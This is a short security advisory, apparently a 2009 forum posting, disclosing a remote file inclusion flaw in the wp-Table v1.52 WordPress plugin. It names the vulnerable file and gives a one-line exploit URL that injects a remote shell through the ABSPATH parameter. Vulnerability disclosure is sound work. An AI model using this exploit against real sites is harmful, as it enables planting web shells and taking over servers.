Computer Security

Security Advisory: wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in XAMPP

From:Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date:30.07.2009
Subject:wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

=================================================================================
==========


 [o] wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

      Software     :  wp-Table v1.52
      Vendor       :  http://wordpress.org/
      Download     :
http://wordpress.org/extend/plugins/wp-table/wp-table.zip
      Author       :  Cru3l.b0y
      Home         :  WwW.DeltaHacking.Net
      Description  :  This plugin is a simple table manager for wordpress.
=================================================================================
==========

 [o] Vulnerable file

        js/wptable-tinymce.php

               require_once(ABSPATH.'/wp-admin/admin.php');
       
       
 [o] Exploit

           http://localhost/[path]/js/wptable-tinymce.php?ABSPATH=shell
          
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server